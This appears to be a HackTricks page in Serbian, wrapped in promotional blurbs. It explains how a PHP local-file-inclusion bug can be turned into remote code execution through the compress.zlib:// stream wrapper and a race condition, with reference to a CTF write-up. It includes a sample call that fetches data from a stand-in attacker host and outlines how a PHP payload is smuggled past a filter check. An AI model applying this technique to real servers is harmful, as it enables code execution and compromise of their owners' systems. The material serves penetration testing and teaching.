LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

WhiteIntel

WhiteIntel je pretraživač na dark vebu koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici kompromitovani od strane malvera za krađu podataka.

Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.

Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za besplatno na:

WhiteIntel

`compress.zlib://` i `PHP_STREAM_PREFER_STDIO`

Fajl otvoren koristeći protokol compress.zlib:// sa zastavicom PHP_STREAM_PREFER_STDIO može nastaviti sa pisanjem podataka koji stižu na konekciju kasnije u isti fajl.

To znači da poziv kao što je:

file_get_contents("compress.zlib://http://attacker.com/file")

Will send a request asking for http://attacker.com/file, then the server might respond the request with a valid HTTP response, keep the connection open, and send extra data some time later that will be also written into the file.

Možete videti tu informaciju u ovom delu php-src koda u main/streams/cast.c:

/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}

Trka uslova do RCE

Ovaj CTF je rešen korišćenjem prethodne prevare.

Napadač će naterati žrtvin server da otvori vezu i čita fajl sa servera napadača koristeći protokol compress.zlib.

Dok ova veza postoji, napadač će eksfiltrirati putanju do privremenog fajla koji je kreiran (koji je procureo od strane servera).

Dok je veza još uvek otvorena, napadač će iskoristiti LFI učitavanjem privremenog fajla koji kontroliše.

Međutim, postoji provera u veb serveru koja sprečava učitavanje fajlova koji sadrže <?. Stoga, napadač će iskoristiti Trku uslova. U vezi koja je još uvek otvorena, napadač će poslati PHP payload POSLE što je veb server proverio da li fajl sadrži zabranjene karaktere ali PRE nego što učita njegov sadržaj.

Za više informacija pogledajte opis Trke uslova i CTF na https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer

WhiteIntel

WhiteIntel je pretraživač na dark vebu koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici kompromitovani od strane malvera koji kradu podatke.

Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomverom koji proizilaze iz malvera koji kradu informacije.

Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za besplatno na:

WhiteIntel

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu Proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousLFI2RCE via Eternal waiting NextFile Upload

Last updated 3 days ago

WhiteIntel

compress.zlib:// i PHP_STREAM_PREFER_STDIO

Trka uslova do RCE

WhiteIntel

`compress.zlib://` i `PHP_STREAM_PREFER_STDIO`